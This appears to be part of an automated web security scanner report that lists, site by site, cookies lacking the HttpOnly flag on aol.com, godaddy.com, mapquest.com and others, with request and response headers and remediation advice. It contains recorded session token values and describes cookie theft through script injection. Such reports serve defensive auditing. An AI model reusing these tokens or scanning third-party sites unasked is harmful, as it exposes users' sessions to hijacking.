Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://www.aol.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aol.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
Content-Length: 63392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

11.2. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1138
Set-Cookie: JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
Content-Length: 1138

<div id="local-module" class="mnid-local plid-60329">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >Local News
...[SNIP]...

11.3. http://www.crunchboard.com/opening/detailjob.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.crunchboard.com
Path:	/opening/detailjob.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opening/detailjob.php HTTP/1.1
Host: www.crunchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 11:10:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
Location: ./index.php
Vary: Accept-Encoding,User-Agent
Content-Length: 6901
Connection: close
Content-Type: text/html; charset=UTF-8

<script language="javascript" type="text/javascript">

   function hidestatus(URL)
   {
   /*var local= /http:|crunchboard.com/;
   var match = URL.search( local );
   if( match == -1 )
   {
   URL='http://tcbiz.p
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.fightmagazine.com
Path:	/mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.6. https://www.godaddy.com/gdshop/catalog.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/catalog.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/catalog.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:20 GMT
Location: /catalog.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:20 GMT
Connection: close

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. https://www.godaddy.com/gdshop/registrar/search.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.9. https://www.godaddy.com/gdshop/website.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.10. http://www.mapquest.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
t_Id=ZGVmYXVsdDpudWxs; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.11. http://www.mapquest.com/_svc/ad/getads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/ad/getads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.12. http://www.mapquest.com/_svc/apixel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/apixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

11.13. http://www.mapquest.com/_svc/publishing/promo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/publishing/promo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

11.14. http://www.mapquest.com/_svc/searchio previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/searchio

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/_uac/adpage.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.